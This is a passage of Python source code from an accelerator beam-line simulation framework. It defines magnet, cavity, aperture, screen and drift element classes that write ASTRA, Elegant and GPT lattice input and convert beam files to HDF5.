self.add_default('n_kicks', 20)\n self.strength_errors = [0]\n\n\n @property\n def k1(self):\n return self.k1l / self.length\n @k1.setter\n def k1(self, k1):\n self.k1l = self.length * k1\n\n @property\n def dk1(self):\n return self.strength_errors[0]\n @dk1.setter\n def dk1(self, dk1):\n self.strength_errors[0] = dk1\n\n def write_ASTRA(self, n):\n if abs(self.k1 + self.dk1) > 0:\n return self._write_ASTRA(OrderedDict([\n ['Q_pos', {'value': self.middle[2] + self.dz, 'default': 0}],\n ['Q_xoff', {'value': self.middle[0], 'default': 0}],\n ['Q_yoff', {'value': self.middle[1] + self.dy, 'default': 0}],\n ['Q_xrot', {'value': -1*self.y_rot + self.dy_rot, 'default': 0}],\n ['Q_yrot', {'value': -1*self.x_rot + self.dx_rot, 'default': 0}],\n ['Q_zrot', {'value': -1*self.z_rot + self.dz_rot, 'default': 0}],\n ['Q_k', {'value': self.k1 + self.dk1, 'default': 0}],\n ['Q_length', {'value': self.length, 'default': 0}],\n ['Q_smooth', {'value': self.smooth, 'default': 10}],\n ['Q_bore', {'value': self.bore, 'default': 0.016}],\n ['Q_noscale', {'value': self.scale_field}],\n ['Q_mult_a', {'type': 'list', 'value': self.multipoles}],\n ]), n)\n else:\n return None\n\n def write_GPT(self, Brho, ccs=\"wcs\", *args, **kwargs):\n # print(self.objectname)\n # print('self.start = ', self.position_start)\n relpos, relrot = ccs.relative_position(self.position_start, self.global_rotation)\n relpos = relpos + [0, 0, self.length/2.]\n coord = self.gpt_coordinates(relpos, relrot)\n output = str(self.objecttype) + '( ' + ccs.name + ', \"z\", '+ str(relpos[2]) +', '+str(self.length)+', '+str(-Brho*self.k1)+');\\n'\n # coord = self.gpt_coordinates(self.middle, self.global_rotation)\n # output = str(self.objecttype) + '( \"wcs\", ' + coord + ', '+str(self.length)+', '+str(-Brho*self.k1)+');\\n'\n return output\n\nclass 
cavity(frameworkElement):\n\n def __init__(self, name=None, type='cavity', **kwargs):\n super(cavity, self).__init__(name, type, **kwargs)\n self.add_default('tcolumn', '\"t\"')\n self.add_default('wzcolumn', '\"W\"')\n self.add_default('wxcolumn', '\"W\"')\n self.add_default('wycolumn', '\"W\"')\n self.add_default('wcolumn', '\"Ez\"')\n self.add_default('change_p0', 1)\n self.add_default('n_kicks', self.n_cells)\n # self.add_default('method', '\"non-adaptive runge-kutta\"')\n self.add_default('end1_focus', 1)\n self.add_default('end2_focus', 1)\n self.add_default('body_focus_model', \"SRS\")\n self.add_default('lsc_bins', 100)\n self.add_default('current_bins', 0)\n self.add_default('interpolate_current_bins', 1)\n self.add_default('smooth_current_bins', 1)\n\n def update_field_definition(self):\n if hasattr(self, 'field_definition') and self.field_definition is not None:\n self.field_definition = '\"' + expand_substitution(self, '\\''+self.field_definition+'\\'').strip('\\'\"')+'\"'\n if hasattr(self, 'field_definition_sdds') and self.field_definition_sdds is not None:\n self.field_definition_sdds = '\"' + expand_substitution(self, '\\''+self.field_definition_sdds+'\\'').strip('\\'\"')+'\"'\n if hasattr(self, 'field_definition_gdf') and self.field_definition_gdf is not None:\n self.field_definition_gdf = '\"' + expand_substitution(self, '\\''+self.field_definition_gdf+'\\'').strip('\\'\"')+'\"'\n if hasattr(self, 'longitudinal_wakefield_sdds') and self.longitudinal_wakefield_sdds is not None:\n self.longitudinal_wakefield_sdds = '\"' + expand_substitution(self, '\\''+self.longitudinal_wakefield_sdds+'\\'').strip('\\'\"')+'\"'\n if hasattr(self, 'transverse_wakefield_sdds') and self.transverse_wakefield_sdds is not None:\n self.transverse_wakefield_sdds = '\"' + expand_substitution(self, '\\''+self.transverse_wakefield_sdds+'\\'').strip('\\'\"')+'\"'\n\n @property\n def cells(self):\n if (self.n_cells is 0 or self.n_cells is None) and self.cell_length > 0:\n cells = round((self.length-self.cell_length)/self.cell_length)\n cells = int(cells - (cells % 3))\n elif self.n_cells > 0 and (self.cell_length is not None and self.cell_length) > 0:\n if self.cell_length == self.length:\n cells = 1\n else:\n cells = int(self.n_cells - (self.n_cells % 3))\n else:\n cells = None\n return cells\n\n def write_ASTRA(self, n):\n return self._write_ASTRA(OrderedDict([\n ['C_pos', {'value': self.start[2] + self.dz, 'default': 0}],\n ['FILE_EFieLD', {'value': ('\\''+expand_substitution(self, '\\''+self.field_definition+'\\'').strip('\\'\"')+'\\'').replace('\\\\','/'), 'default': 0}],\n ['C_numb', {'value': self.cells}],\n ['Nue', {'value': self.frequency / 1e9, 'default': 2998.5}],\n ['MaxE', {'value': self.field_amplitude / 1e6, 'default': 0}],\n ['Phi', {'value': -self.phase, 'default': 0.0}],\n ['C_smooth', {'value': self.smooth, 'default': 10}],\n ['C_xoff', {'value': self.start[0] + self.dx, 'default': 0}],\n ['C_yoff', {'value': self.start[1] + self.dy, 'default': 0}],\n ['C_xrot', {'value': self.y_rot + self.dy_rot, 'default': 0}],\n ['C_yrot', {'value': self.x_rot + self.dx_rot, 'default': 0}],\n ['C_zrot', {'value': self.z_rot + self.dz_rot, 'default': 0}],\n ]), n)\n\n def _write_Elegant(self):\n self.update_field_definition()\n wholestring=''\n etype = self._convertType_Elegant(self.objecttype)\n if (not hasattr(self, 'longitudinal_wakefield_sdds') or self.longitudinal_wakefield_sdds == None) and (not hasattr(self, 'transverse_wakefield_sdds') or self.transverse_wakefield_sdds == None):\n # 
print('cavity ', self.objectname, ' is an RFCA!')\n etype = 'rfca'\n string = self.objectname+': '+ etype\n for key, value in list(merge_two_dicts(self.objectproperties, self.objectdefaults).items()):\n if not key is 'name' and not key is 'type' and not key is 'commandtype' and self._convertKeword_Elegant(key) in elements_Elegant[etype]:\n value = getattr(self, key) if hasattr(self, key) and getattr(self, key) is not None else value\n key = self._convertKeword_Elegant(key)\n if self.objecttype == 'cavity':\n # In ELEGANT all phases are +90degrees!!\n value = 90 - value if key.lower() == 'phase' else value\n # If using rftmez0 or similar\n # value = ((90+value)/360.0)*(2*3.14159) if key.lower() == 'phase' else value\n # In ELEGANT the voltages need to be compensated\n value = (self.cells+4.7) * self.cell_length * (1 / np.sqrt(2)) * value if key.lower() == 'volt' else value\n # If using rftmez0 or similar\n value = 1/(2**0.5) * value if key.lower() == 'ez' else value\n # In CAVITY NKICK = n_cells\n value = 3*self.cells if key.lower() == 'n_kicks' else value\n if key.lower() == 'n_bins' and value > 0:\n print('WARNING: Cavity n_bins is not zero - check log file to ensure correct behaviour!')\n value = 1 if value is True else value\n value = 0 if value is False else value\n tmpstring = ', '+key+' = '+str(value)\n if len(string+tmpstring) > 76:\n wholestring+=string+',&\\n'\n string=''\n string+=tmpstring[2::]\n else:\n string+= tmpstring\n wholestring+=string+';\\n'\n return wholestring\n\n def write_GPT(self, Brho, ccs=\"wcs\", *args, **kwargs):\n self.update_field_definition()\n relpos, relrot = ccs.relative_position(self.start, self.global_rotation)\n relpos = relpos + [0, 0, 0]\n coord = self.gpt_coordinates(relpos, relrot)\n '''\n map1D_TM(\"wcs\",\"z\",linacposition,\"mockup2m.gdf\",\"Z\",\"Ez\",ffacl,phil,w);\n '''\n if self.gpt_phase_offset is None:\n self.gpt_phase_offset = 0\n output = 'f = ' + str(self.frequency) +';\\n' + \\\n 'w = 2*pi*f;\\n' + \\\n 'phi = ' + str(self.gpt_phase_offset + self.phase) + '/deg;\\n' + \\\n 'ffac = ' + str(self.field_amplitude)+';\\n' + \\\n 'map1D_TM' + '( ' + ccs.name + ', \"z\", '+ str(relpos[2]) +', \\\"'+str(expand_substitution(self,self.field_definition_gdf).strip('\\'\"')).replace('\\\\','/')+'\", \"Z\",\"Ez\", ffac, phi, w);\\n'\n return output\n\nclass rf_deflecting_cavity(cavity):\n\n def __init__(self, name=None, type='rf_deflecting_cavity', **kwargs):\n super(rf_deflecting_cavity, self).__init__(name, type, **kwargs)\n self.add_default('n_kicks', 10)\n\nclass solenoid(frameworkElement):\n\n def __init__(self, name=None, type='solenoid', **kwargs):\n super(solenoid, self).__init__(name, type, **kwargs)\n\n def write_ASTRA(self, n):\n return self._write_ASTRA(OrderedDict([\n ['S_pos', {'value': self.start[2] + self.dz, 'default': 0}],\n ['FILE_BFieLD', {'value': (''+expand_substitution(self, '\\''+self.field_definition+'\\'')+'').replace('\\\\','/')}],\n ['MaxB', {'value': self.field_amplitude, 'default': 0}],\n ['S_smooth', {'value': self.smooth, 'default': 10}],\n ['S_xoff', {'value': self.start[0] + self.dx, 'default': 0}],\n ['S_yoff', {'value': self.start[1] + self.dy, 'default': 0}],\n ['S_xrot', {'value': self.y_rot + self.dy_rot, 'default': 0}],\n ['S_yrot', {'value': self.x_rot + self.dx_rot, 'default': 0}],\n ]), n)\n\n def write_GPT(self, Brho, ccs=\"wcs\", *args, **kwargs):\n relpos, relrot = ccs.relative_position(self.start, self.global_rotation)\n relpos = relpos + [0, 0, 0]\n coord = self.gpt_coordinates(relpos, relrot)\n '''\n 
map1D_B(\"wcs\",xOffset,0,zOffset+0.,cos(angle),0,-sin(angle),0,1,0,\"bas_sol_norm.gdf\",\"Z\",\"Bz\",gunSolField);\n '''\n if self.gpt_phase_offset is None:\n self.gpt_phase_offset = 0\n output = 'map1D_B' + '( ' + ccs.name + ', \"z\", '+ str(relpos[2]) + \\\n ', \\\"'+str(expand_substitution(self, self.field_definition_gdf).strip('\\'\"')).replace('\\\\','/') + \\\n '\", \"Z\",\"Bz\", '+ str(self.field_amplitude) + ');\\n'\n return output\n\nclass aperture(frameworkElement):\n\n def __init__(self, name=None, type='aperture', **kwargs):\n super(aperture, self).__init__(name, type, **kwargs)\n self.number_of_elements = 1\n\n def write_GPT(self, Brho, ccs=\"wcs\", *args, **kwargs):\n return ''\n # if self.shape == 'elliptical':\n # output = 'rmax'\n # else:\n # output = 'xymax'\n # output += '( \"wcs\", '+self.gpt_coordinates()+', '+str(self.horizontal_size)+', '+str(self.length)+');\\n'\n # return output\n\n def write_ASTRA_Common(self, dic):\n dic['Ap_Z1'] = {'value': self.start[2] + self.dz, 'default': 0}\n end = self.end[2] + self.dz if self.end[2] > self.start[2] else self.start[2] + self.dz + 1e-3\n dic['Ap_Z2'] = {'value': end, 'default': 0}\n dic['A_xrot'] = {'value': self.y_rot + self.dy_rot, 'default': 0}\n dic['A_yrot'] = {'value': self.x_rot + self.dx_rot, 'default': 0}\n dic['A_zrot'] = {'value': self.z_rot + self.dz_rot, 'default': 0}\n return dic\n\n def write_ASTRA_Circular(self, n):\n dic = OrderedDict()\n dic['File_Aperture'] = {'value': 'RAD'}\n if self.radius is not None:\n radius = self.radius\n elif self.horizontal_size > 0 and self.vertical_size > 0:\n radius = min([self.horizontal_size, self.vertical_size])\n elif self.horizontal_size > 0:\n radius = self.horizontal_size\n elif self.vertical_size > 0:\n radius = self.vertical_size\n else:\n radius = 1\n dic['Ap_R'] = {'value': 1e3*radius}\n return self.write_ASTRA_Common(dic)\n\n def write_ASTRA_Planar(self, n, plane, width):\n dic = OrderedDict()\n dic['File_Aperture'] = {'value': plane}\n dic['Ap_R'] = {'value': width}\n return self.write_ASTRA_Common(dic)\n\n def write_ASTRA(self, n):\n self.number_of_elements = 1\n if self.shape == 'elliptical' or self.shape == 'circular':\n dic = self.write_ASTRA_Circular(n)\n return self._write_ASTRA(dic, n)\n elif self.shape == 'planar' or self.shape == 'rectangular':\n text = ''\n if self.horizontal_size > 0:\n dic = self.write_ASTRA_Planar(n, 'Col_X', 1e3*self.horizontal_size)\n text += self._write_ASTRA(dic, n)\n n = n + 1\n self.number_of_elements = self.number_of_elements + 1\n if self.vertical_size > 0:\n dic = self.write_ASTRA_Planar(n, 'Col_Y', 1e3*self.vertical_size)\n if self.number_of_elements > 1:\n text += '\\n'\n text += self._write_ASTRA(dic, n)\n return text\n\nclass scatter(frameworkElement):\n\n def __init__(self, name=None, type='scatter', **kwargs):\n super(scatter, self).__init__(name, type, **kwargs)\n # print('Scatter object ', self.objectname,' - DP = ', self.objectproperties)\n\n def _write_Elegant(self):\n wholestring=''\n etype = 'scatter'\n string = self.objectname+': '+ etype\n k1 = self.k1 if self.k1 is not None else 0\n for key, value in list(merge_two_dicts({'k1': k1}, merge_two_dicts(self.objectproperties, self.objectdefaults)).items()):\n if not key is 'name' and not key is 'type' and not key is 'commandtype' and self._convertKeword_Elegant(key) in elements_Elegant[etype]:\n value = getattr(self, key) if hasattr(self, key) and getattr(self, key) is not None else value\n key = self._convertKeword_Elegant(key)\n tmpstring = ', '+key+' = 
'+str(value)\n if len(string+tmpstring) > 76:\n wholestring+=string+',&\\n'\n string=''\n string+=tmpstring[2::]\n else:\n string+= tmpstring\n wholestring+=string+';\\n'\n return wholestring\n\nclass cleaner(frameworkElement):\n\n def __init__(self, name=None, type='scatter', **kwargs):\n super(cleaner, self).__init__(name, type, **kwargs)\n # print('Scatter object ', self.objectname,' - DP = ', self.objectproperties)\n\n def _write_Elegant(self):\n wholestring=''\n etype = 'clean'\n string = self.objectname+': '+ etype\n for key, value in merge_two_dicts(self.objectproperties, self.objectdefaults).items():\n if not key is 'name' and not key is 'type' and not key is 'commandtype' and self._convertKeword_Elegant(key) in elements_Elegant[etype]:\n value = getattr(self, key) if hasattr(self, key) and getattr(self, key) is not None else value\n key = self._convertKeword_Elegant(key)\n tmpstring = ', '+key+' = '+str(value)\n if len(string+tmpstring) > 76:\n wholestring+=string+',&\\n'\n string=''\n string+=tmpstring[2::]\n else:\n string+= tmpstring\n wholestring+=string+';\\n'\n return wholestring\n\nclass wall_current_monitor(frameworkElement):\n\n def __init__(self, name=None, type='wall_current_monitor', **kwargs):\n super(wall_current_monitor, self).__init__(name, type, **kwargs)\n\nclass integrated_current_transformer(wall_current_monitor):\n\n def __init__(self, name=None, type='integrated_current_transformer', **kwargs):\n super(integrated_current_transformer, self).__init__(name, type, **kwargs)\n\nclass screen(frameworkElement):\n\n def __init__(self, name=None, type='screen', **kwargs):\n super(screen, self).__init__(name, type, **kwargs)\n if 'output_filename' not in kwargs:\n self.output_filename = str(self.objectname)+'.sdds'\n\n def write_ASTRA(self, n):\n return self._write_ASTRA(OrderedDict([\n ['Screen', {'value': self.middle[2], 'default': 0}],\n ['Scr_xrot', {'value': self.y_rot + self.dy_rot, 'default': 0}],\n ['Scr_yrot', {'value': self.x_rot + self.dx_rot, 'default': 0}],\n ]), n)\n\n def _write_Elegant(self):\n wholestring=''\n etype = self._convertType_Elegant(self.objecttype)\n string = self.objectname+': '+ etype\n # if self.length > 0:\n # d = drift(self.objectname+'-drift-01', type='drift', **{'length': self.length/2})\n # wholestring+=d._write_Elegant()\n for key, value in list(merge_two_dicts(self.objectproperties, self.objectdefaults).items()):\n if not key is 'name' and not key is 'type' and not key is 'commandtype' and self._convertKeword_Elegant(key) in elements_Elegant[etype]:\n value = getattr(self, key) if hasattr(self, key) and getattr(self, key) is not None else value\n key = self._convertKeword_Elegant(key)\n tmpstring = ', '+key+' = '+str(value)\n if len(string+tmpstring) > 76:\n wholestring+=string+',&\\n'\n string=''\n string+=tmpstring[2::]\n else:\n string+= tmpstring\n wholestring+=string+';\\n'\n # if self.length > 0:\n # d = drift(self.objectname+'-drift-02', type='drift', **{'length': self.length/2})\n # wholestring+=d._write_Elegant()\n return wholestring\n\n def write_CSRTrack(self, n):\n z = self.middle[2]\n return \"\"\"quadrupole{\\nposition{rho=\"\"\"+str(z)+\"\"\", psi=0.0, marker=screen\"\"\"+str(n)+\"\"\"a}\\nproperties{strength=0.0, alpha=0, horizontal_offset=0,vertical_offset=0}\\nposition{rho=\"\"\"+str(z+1e-6)+\"\"\", psi=0.0, marker=screen\"\"\"+str(n)+\"\"\"b}\\n}\\n\"\"\"\n\n def write_GPT(self, Brho, ccs=\"wcs\", *args, **kwargs):\n relpos, relrot = ccs.relative_position(self.position_start, self.global_rotation)\n relpos = 
relpos + [0, 0, self.length/2.]\n coord = self.gpt_coordinates(relpos, relrot)\n self.gpt_screen_position = relpos[2]\n output = 'screen( ' + ccs.name + ', \"I\", '+ str(relpos[2]) +');\\n'\n return output\n\n def astra_to_hdf5(self, lattice):\n master_run_no = self.global_parameters['run_no'] if 'run_no' in self.global_parameters else 1\n astrabeamfilename = None\n for i in [0, -0.001, 0.001]:\n tempfilename = lattice + '.' + str(int(round((self.middle[2]+i-self.zstart[2])*100))).zfill(4) + '.' + str(master_run_no).zfill(3)\n if os.path.isfile(self.global_parameters['master_subdir'] + '/' + tempfilename):\n astrabeamfilename = tempfilename\n if astrabeamfilename is None:\n print(( 'Screen Error: ', lattice, self.middle[2], self.zstart[2]))\n else:\n self.global_parameters['beam'].read_astra_beam_file((self.global_parameters['master_subdir'] + '/' + astrabeamfilename).strip('\\\"'), normaliseZ=False)\n self.global_parameters['beam'].rotate_beamXZ(-1*self.starting_rotation, preOffset=[0,0,0], postOffset=-1*np.array(self.starting_offset))\n HDF5filename = (self.objectname+'.hdf5').strip('\\\"')\n self.global_parameters['beam'].write_HDF5_beam_file(self.global_parameters['master_subdir'] + '/' + HDF5filename, centered=False, sourcefilename=astrabeamfilename, pos=self.middle)\n\n def sdds_to_hdf5(self):\n elegantbeamfilename = self.output_filename.replace('.sdds','.SDDS').strip('\\\"')\n self.global_parameters['beam'].read_SDDS_beam_file(self.global_parameters['master_subdir'] + '/' + elegantbeamfilename)\n HDF5filename = self.output_filename.replace('.sdds','.hdf5').replace('.SDDS','.hdf5').strip('\\\"')\n self.global_parameters['beam'].write_HDF5_beam_file(self.global_parameters['master_subdir'] + '/' + HDF5filename, centered=False, sourcefilename=elegantbeamfilename, pos=self.middle, zoffset=self.end)\n\n def gdf_to_hdf5(self, gptbeamfilename):\n # gptbeamfilename = self.objectname + '.' + str(int(round((self.allElementObjects[self.end].position_end[2])*100))).zfill(4) + '.' 
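
astra_to_hdf5 above locates ASTRA dumps named <lattice>.<z in cm, zero-padded to 4>.<run, zero-padded to 3>, probing z by +/-1 mm to absorb rounding; the same lookup in isolation (a sketch assuming that naming convention; the "injector" lattice name in the comment is only an example):

import os

def find_astra_dump(subdir, lattice, z_middle, z_start, run_no):
    # e.g. "injector.0123.001" for z - z_start = 1.23 m on run 1
    for dz in (0, -0.001, 0.001):
        name = '%s.%s.%s' % (lattice,
                             str(int(round((z_middle + dz - z_start) * 100))).zfill(4),
                             str(run_no).zfill(3))
        if os.path.isfile(os.path.join(subdir, name)):
            return name
    return None
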
+ str(master_run_no).zfill(3)\n try:\n # print('Converting screen', self.objectname,'at', self.gpt_screen_position)\n self.global_parameters['beam'].read_gdf_beam_file(self.global_parameters['master_subdir'] + '/' + gptbeamfilename, position=self.gpt_screen_position)\n HDF5filename = self.objectname+'.hdf5'\n self.global_parameters['beam'].write_HDF5_beam_file(self.global_parameters['master_subdir'] + '/' + HDF5filename, centered=False, sourcefilename=gptbeamfilename)\n except:\n print('Error with screen', self.objectname,'at', self.gpt_screen_position)\n\nclass monitor(screen):\n\n def __init__(self, name=None, type='monitor', **kwargs):\n super(monitor, self).__init__(name, type, **kwargs)\n\nclass watch_point(screen):\n\n def __init__(self, name=None, type='watch_point', **kwargs):\n super(watch_point, self).__init__(name, 'screen', **kwargs)\n\nclass beam_position_monitor(screen):\n\n def __init__(self, name=None, type='beam_position_monitor', **kwargs):\n super(beam_position_monitor, self).__init__(name, type, **kwargs)\n\n def write_ASTRA(self, n):\n return self._write_ASTRA(OrderedDict([\n ['Screen', {'value': self.middle[2], 'default': 0}],\n ['Scr_xrot', {'value': self.y_rot + self.dy_rot, 'default': 0}],\n ['Scr_yrot', {'value': self.x_rot + self.dx_rot, 'default': 0}],\n ]), n)\n\nclass beam_arrival_monitor(screen):\n\n def __init__(self, name=None, type='beam_arrival_monitor', **kwargs):\n super(beam_arrival_monitor, self).__init__(name, type, **kwargs)\n\n def write_ASTRA(self, n):\n return ''\n\nclass collimator(aperture):\n\n def __init__(self, name=None, type='collimator', **kwargs):\n super(collimator, self).__init__(name, type, **kwargs)\n\nclass marker(screen):\n\n def __init__(self, name=None, type='marker', **kwargs):\n super(marker, self).__init__(name, 'screen', **kwargs)\n\n def write_CSRTrack(self, n):\n return ''\n\nclass drift(frameworkElement):\n\n def __init__(self, name=None, type='drift', **kwargs):\n super(drift, self).__init__(name, type, **kwargs)\n\n # def _write_Elegant(self):\n # wholestring=''\n # etype = self._convertType_Elegant(self.objecttype)\n # string = self.objectname+': '+ etype\n # for key, value in list(merge_two_dicts(self.objectproperties, self.objectdefaults).items()):\n # if not key is 'name' and not key is 'type' and not key is 'commandtype' and self._convertKeword_Elegant(key) in elements_Elegant[etype]:\n # value = getattr(self, key) if hasattr(self, key) and getattr(self, key) is not None else value\n # key = self._convertKeword_Elegant(key)\n # value = 1 if value is True else value\n # value = 0 if value is False else value\n # tmpstring = ', '+key+' = '+str(value)\n # if len(string+tmpstring) > 76:\n # wholestring+=string+',&\\n'\n # string=''\n # string+=tmpstring[2::]\n # else:\n # string+= tmpstring\n # wholestring+=string+';\\n'\n # return wholestring\n\nclass csrdrift(frameworkElement):\n\n def __init__(self, name=None, type='csrdrift', **kwargs):\n super(csrdrift, self).__init__(name, type, **kwargs)\n self.add_default('lsc_interpolate', 1)\n\n def _write_Elegant(self):\n wholestring=''\n etype = self._convertType_Elegant(self.objecttype)\n string = self.objectname+': '+ etype\n for key, value in list(merge_two_dicts(self.objectproperties, self.objectdefaults).items()):\n if not key is 'name' and not key is 'type' and not key is 'commandtype' and self._convertKeword_Elegant(key) in elements_Elegant[etype]:\n value = getattr(self, key) if hasattr(self, key) and getattr(self, key) is not None else value\n key = 
self._convertKeword_Elegant(key)\n value = 1 if value is True else value\n value = 0 if value is False else value\n tmpstring = ', '+key+' = '+str(value)\n if len(string+tmpstring) > 76:\n wholestring+=string+',&\\n'\n string=''\n string+=tmpstring[2::]\n else:\n string+= tmpstring\n wholestring+=string+';\\n'\n return wholestring\n\nclass lscdrift(frameworkElement):\n\n def __init__(self, name=None, type='lscdrift', **kwargs):\n super(lscdrift, self).__init__(name, type, **kwargs)\n\n def _write_Elegant(self):\n wholestring=''\n etype = self._convertType_Elegant(self.objecttype)\n string = self.objectname+': '+ etype\n for key, value in list(merge_two_dicts(self.objectproperties, self.objectdefaults).items()):\n if not key is 'name' and not key is 'type' and not key is 'commandtype' and self._convertKeword_Elegant(key) in elements_Elegant[etype]:\n value = getattr(self, key) if hasattr(self, key) and getattr(self, key) is not None else value\n key = self._convertKeword_Elegant(key)\n value = 1 if value is True else value\n value = 0 if value is False else value\n tmpstring = ', '+key+' = '+str(value)\n if len(string+tmpstring) > 76:\n wholestring+=string+',&\\n'\n string=''\n string+=tmpstring[2::]\n else:\n string+= tmpstring\n wholestring+=string+';\\n'\n return wholestring\n\nclass shutter(csrdrift):\n\n def __init__(self, name=None, type='shutter', **kwargs):\n super(shutter, self).__init__(name, type, **kwargs)\n\nclass valve(csrdrift):\n\n def __init__(self, name=None, type='valve', **kwargs):\n super(valve, self).__init__(name, type, **kwargs)\n\nclass bellows(csrdrift):\n\n def __init__(self, name=None, type='bellows', **kwargs):\n super(bellows, self).__init__(name, type, **kwargs)\n\nclass fel_modulator(frameworkElement):\n\n def __init__(self, name=None, type='modulator', **kwargs):\n super(fel_modulator, self).__init__(name, type, **kwargs)\n self.add_default('k1l', 0)\n self.add_default('n_steps', 1*self.periods)\n\n def write_ASTRA(self, n):\n return self._write_ASTRA(OrderedDict([\n ['Q_pos', {'value': self.middle[2] + self.dz, 'default': 0}],\n ]), n)\n\n def _write_Elegant(self):\n wholestring=''\n etype = self._convertType_Elegant(self.objecttype)\n string = self.objectname+': '+ etype\n for key, value in list(merge_two_dicts(self.objectproperties, self.objectdefaults).items()):\n if not key is 'name' and not key is 'type' and not key is 'commandtype' and self._convertKeword_Elegant(key) in elements_Elegant[etype]:\n value = getattr(self, key) if hasattr(self, key) and getattr(self, key) is not None else value\n key = self._convertKeword_Elegant(key)\n tmpstring = ', '+key+' = '+str(value)\n if len(string+tmpstring) > 76:\n wholestring+=string+',&\\n'\n string=''\n string+=tmpstring[2::]\n else:\n string+= tmpstring\n wholestring+=string+';\\n'\n return wholestring\n\nclass wiggler(frameworkElement):\n\n def __init__(self, name=None, type='wiggler', **kwargs):\n super(wiggler, self).__init__(name, type, **kwargs)\n # self.add_default('k1l', 0)\n # self.add_default('n_steps', 1*self.periods)\n\n def write_ASTRA(self, n):\n return self._write_ASTRA(OrderedDict([\n ['Q_pos', {'value': self.middle[2] + self.dz, 'default': 0}],\n ]), n)\n\n def _write_Elegant(self):\n wholestring=''\n if ('k' in self and abs(self.k) > 0) or ('peak_field' in self and abs(self.peak_field) > 0) or ('radius' in self and abs(self.radius) > 0):\n etype = self._convertType_Elegant(self.objecttype)\n else:\n etype = 'drift'\n string = self.objectname+': '+ etype\n for key, value in 
list(merge_two_dicts(self.objectproperties, self.objectdefaults).items()):\n if not key is 'name' and not key is 'type' and not key is 'commandtype' and self._convertKeword_Elegant(key) in elements_Elegant[etype]:\n value = getattr(self, key) if hasattr(self, key) and getattr(self, key) is not None else value\n key = self._convertKeword_Elegant(key)\n tmpstring = ', '+key+' = '+str(value)\n if len(string+tmpstring) > 76:\n wholestring+=string+',&\\n'\n string=''\n string+=tmpstring[2::]\n else:\n string+= tmpstring\n wholestring+=string+';\\n'\n return wholestring\n\nclass charge(frameworkElement):\n def __init__(self, name=None, type='charge', **kwargs):\n super(charge, self).__init__(name, 'charge', **kwargs)\n\nclass global_error(frameworkElement):\n\n def __init__(self, name=None, type='global_error', **kwargs):\n super(global_error, self).__init__(name, 'global_error', **kwargs)\n # self._errordict = {}\n\n def add_Error(self, type, sigma):\n if type in global_Error_Types:\n self.add_property(type, sigma)\n\n def write_ASTRA(self):\n return self._write_ASTRA(OrderedDict([[key, {'value': value}] for key, value in self._errordict]))\n\n def write_GPT(self, Brho, ccs=\"wcs\", *args, **kwargs):\n relpos, relrot = ccs.relative_position(self.middle, [0,0,0])\n coord = self.gpt_coordinates(relpos, relrot)\n output = str(self.objecttype) + '( '+ ccs.name +', '+ coord +', '+str(self.length)+', '+str(Brho*self.k1)+');\\n'\n return output\n\nclass longitudinal_wakefield(cavity):\n\n def __init__(self, name=None, type='longitudinal_wakefield', **kwargs):\n super(longitudinal_wakefield, self).__init__(name, type, **kwargs)\n self.add_default('coupling_cell_length', 0)\n\n def write_ASTRA(self, startn):\n self.update_field_definition()\n current_bins = self.current_bins if self.current_bins > 0 else 11\n output = ''\n if self.scale_kick > 0:\n for n in range(startn, startn+self.cells):\n output += self._write_ASTRA(OrderedDict([\n ['Wk_Type', {'value': self.waketype, 'default': '\\'Taylor_Method_F\\''}],\n ['Wk_filename', {'value': ('\\''+expand_substitution(self, '\\''+self.field_definition+'\\'').strip('\\'\"')+'\\'').replace('\\\\','/'), 'default': 0}],\n ['Wk_x', {'value': self.x_offset, 'default': 0}],\n ['Wk_y', {'value': self.y_offset, 'default': 0}],\n ['Wk_z', {'value': self.start[2] + self.coupling_cell_length + (n-1)*self.cell_length}],\n ['Wk_ex', {'value': self.scale_field_ex, 'default': 0}],\n ['Wk_ey', {'value': self.scale_field_ey, 'default': 0}],\n ['Wk_ez', {'value': self.scale_field_ez, 'default': 1}],\n ['Wk_hx', {'value': self.scale_field_hx, 'default': 1}],\n ['Wk_hy', {'value': self.scale_field_hy, 'default': 0}],\n ['Wk_hz', {'value': self.scale_field_hz, 'default': 0}],\n ['Wk_equi_grid', {'value': self.equal_grid, 'default': 0}],\n ['Wk_N_bin', {'value': current_bins, 'default': 11}],\n ['Wk_ip_method', {'value': self.interpolation_method, 'default': 2}],\n ['Wk_smooth', {'value': self.smooth, 'default': 0.5}],\n ['Wk_sub', {'value': self.subbins, 'default': 4}],\n ['Wk_scaling', {'value': self.scale_kick, 'default': 1}],\n ]), n)\n output += '\\n'\n return output\n\n def _write_Elegant(self):\n self.update_field_definition()\n wholestring=''\n etype = self._convertType_Elegant(self.objecttype)\n string = self.objectname+': '+ etype\n if self.length > 0:\n d = drift(self.objectname+'-drift', type='drift', **{'length': self.length})\n wholestring+=d._write_Elegant()\n for key, value in list(merge_two_dicts(self.objectproperties, self.objectdefaults).items()):\n if not key 
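
longitudinal_wakefield.write_ASTRA above writes one wakefield namelist per cell, each at Wk_z = start + coupling_cell_length + (n-1)*cell_length; the position arithmetic in isolation (note the loop reuses the running ASTRA namelist index n, so startn is presumably 1 for a standalone structure):

def wake_positions(z_start, coupling_cell_length, cell_length, cells, startn=1):
    # One wake-kick position per cell, offset by the coupling cell.
    return [z_start + coupling_cell_length + (n - 1) * cell_length
            for n in range(startn, startn + cells)]
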
is 'name' and not key is 'type' and not key is 'commandtype' and self._convertKeword_Elegant(key) in elements_Elegant[etype]:\n value = getattr(self, key) if hasattr(self, key) and getattr(self, key) is not None else value\n key = self._convertKeword_Elegant(key)\n tmpstring = ', '+key+' = '+str(value)\n if len(string+tmpstring) > 76:\n wholestring+=string+',&\\n'\n string=''\n string+=tmpstring[2::]\n else:\n string+= tmpstring\n wholestring+=string+';\\n'\n return wholestring\n\nclass gpt_ccs(Munch):\n\n def __init__(self, name, position, rotation, intersect=0):\n super(gpt_ccs, self).__init__()\n self._name = name\n self.intersect = intersect\n self.x, self.y, self.z = position\n self.psi, self.phi, self.theta = rotation\n\n def relative_position(self, position, rotation):\n x, y, z = position\n psi, phi, theta = rotation\n # print(self.name, [x - self.x, y - self.y, z - self.z])\n # print(self.name, [psi - self.psi, phi - self.phi, theta - self.theta])\n newpos = [x - self.x, y - self.y, z - self.z]\n # print('newpos = ', self.name, x, self.x, y, self.y, z, self.z)\n finalrot = [psi - self.psi, phi - self.phi, theta - self.theta]\n finalpos = np.array([0,0,self.intersect]) + np.dot(np.array(newpos), _rotation_matrix(-self.theta))\n return finalpos, finalrot\n\n @property\n def name(self):\n return '\"' + self._name + '\"'\n @property\n def position(self):\n return self.x, self.y, self.z\n @property\n def rotation(self):\n return 